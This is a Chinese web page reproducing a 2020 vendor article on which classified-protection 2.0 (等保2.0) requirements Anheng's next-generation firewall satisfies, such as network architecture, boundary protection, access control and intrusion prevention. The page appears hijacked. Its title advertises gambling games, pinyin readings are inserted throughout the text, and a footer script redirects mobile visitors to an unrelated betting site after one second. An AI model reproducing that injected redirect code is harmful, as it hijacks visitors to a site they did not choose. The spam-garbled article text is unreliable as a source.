mg游戏推荐

一文读懂NGFW满足等保2.0哪些要求?

2020-10-23 16:04:16 infoadmin 117


什么是下一代防火墙NGFW


安(an)恒信息NGFW秉持(chi)安(an)全(quan)可视、简单有效的(de)理念,以资产为视角,构建“事(shi)前+事(shi)中(zhong)+事(shi)后”全(quan)流程(cheng)防御的(de)下(xia)一代安(an)全(quan)防护体(ti)系,融(rong)合(he)传统(tong)防火墙、入(ru)侵防御系统(tong)、防病毒网关、上(shang)网行为管控、VPN网关、威胁情报(bao)等安(an)全(quan)模块(kuai)于(yu)一体(ti)的(de)智慧化(hua)安(an)全(quan)网关。


图片关键词





NGFW满足了等保中的哪些要求




图片关键词

 01 安全通信网络层面要求与相关功能



控制点1:网络架构

测评项应(ying)提供通信(xin)线路、关(guan)键网络设备和关(guan)键计(ji)算设备的(de)硬件冗余,保证(zheng)系统(tong)的(de)可用性。


控制点2:通信传输

测评项:应采用(yong)密码技(ji)术保(bao)证(zheng)通(tong)信过程中数(shu)据的保(bao)密性。


相(xiang)关功能:

1、支持(chi)路由模(mo)式、透明模(mo)式的HA高可(ke)靠(kao)(kao)性部署(shu),可(ke)工作(zuo)于(yu)主(zhu)备、主(zhu)主(zhu)模(mo)式,会话、用户、配置等(deng)可(ke)实时(shi)同步,HA高可(ke)靠(kao)(kao)性部署(shu)支持(chi)接口联动、链路探测

2、支(zhi)持(chi)与(yu)主流VPN厂(chang)商(shang)的IPSec VPN接入(ru),支(zhi)持(chi)SSL VPN。


 02 安全区域边界层面要求与相关功能



控制点1:边界防护

测评项

1、应保证跨(kua)越边(bian)界的访问和数据流通(tong)过边(bian)界设备提(ti)供的受控接口(kou)进行通(tong)信(xin);

2、应能够对(dui)非授(shou)权设(she)备私自联到内部网络的行为进行检查或限制;

3、应能够对内(nei)部(bu)用(yong)户非授权联到外部(bu)网络的行为进(jin)行检(jian)查或限制;


控制点2:访问控制

测评项:

1、应在网络边界或(huo)区域之间(jian)根据访(fang)问(wen)控制策略设(she)置访(fang)问(wen)控制规则,默认(ren)情况下除(chu)允许通信外受控接口拒绝所有(you)通信;

2、应(ying)删除多余或无效的访问(wen)(wen)控制规(gui)则,优化(hua)访问(wen)(wen)控制列表(biao),并保证访问(wen)(wen)控制规(gui)则数量(liang)最小化(hua);

3、应对源地(di)址、目(mu)的地(di)址、源端(duan)(duan)口、目(mu)的端(duan)(duan)口和协议等(deng)进(jin)行检查,以允许/拒绝数(shu)据(ju)包进(jin)出;

4、应(ying)对进出网络的数据(ju)流实现基于(yu)应(ying)用(yong)协议和(he)应(ying)用(yong)内容的访问(wen)控(kong)制。


控制点3:入侵防范

1、 应在关键网络节点处检测、防止或限制从外部发起(qi)的网络攻(gong)击行为;

2、 应(ying)采取技术措施对网(wang)络行(xing)为进行(xing)分(fen)析(xi),实现对网(wang)络攻(gong)击特别是新型网(wang)络攻(gong)击行(xing)为的(de)分(fen)析(xi)


相(xiang)关功(gong)能:

1、支持(chi)一(yi)体化安(an)全策(ce)略:可基于(yu)设备接口/安(an)全域、地址(zhi)、服务(wu)、应(ying)用(yong)、用(yong)户、时间等属(shu)性,配(pei)置入侵防御、病(bing)毒防护、URL过滤(lv)、应(ying)用(yong)过滤(lv)、会话老化时间、终端过滤(lv)等高级访问控制功(gong)能;

2、提供策(ce)(ce)略分(fen)析引(yin)擎,支(zhi)持一键全局(ju)分(fen)析和单独(du)策(ce)(ce)略的即时分(fen)析,至少支(zhi)持检测出冗余(yu)策(ce)(ce)略、隐藏策(ce)(ce)略、冲突(tu)策(ce)(ce)略、可合并策(ce)(ce)略、空策(ce)(ce)略、过期策(ce)(ce)略;

3、支持应(ying)用识别(bie),内置应(ying)用特(te)征库(ku),可识别(bie)iOS、安卓等移动(dong)互(hu)联网软(ruan)件如微博、微信等特(te)征,并可智(zhi)能识别(bie)P2P和迅雷(lei)行(xing)为(wei),支持在(zai)线升级(ji)和手动(dong)升级(ji);

4、内置IPS规则库,包(bao)含安全(quan)漏洞、CGI攻击(ji)、缓存溢出(chu)、木马后门(men)、网络数据库攻击(ji)、蠕虫病(bing)毒、间谍软件、欺骗劫持(chi)等(deng)安全(quan)类型,并支持(chi)在线升(sheng)级(ji)和手动升(sheng)级(ji);

5、支持病毒检测引擎,内置病毒库不少于百(bai)万条,支持在线升(sheng)级(ji)和手(shou)动升(sheng)级(ji);

6、支(zhi)持基于(yu)资产的安全分析,支(zhi)持展示网络中存在(zai)安全风(feng)险的资产以(yi)及对应的风(feng)险级别,至少可查(cha)看(kan)资产基本信息、攻(gong)击态(tai)势、攻(gong)击日志统计、攻(gong)击的具体事(shi)件类型、攻(gong)击时间等;

7、支持基(ji)于攻击(ji)(ji)不同阶段的(de)方(fang)式来(lai)匹(pi)配并展示攻击(ji)(ji)者发(fa)起(qi)攻击(ji)(ji)的(de)具(ju)(ju)体所(suo)(suo)处状态,资产遭受到攻击(ji)(ji)的(de)具(ju)(ju)体所(suo)(suo)处状态,展示出具(ju)(ju)体的(de)攻击(ji)(ji)链(lian)并可对威胁(xie)进(jin)行取证。




本文转自(zi)《安恒信息合(he)作伙伴中心》

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();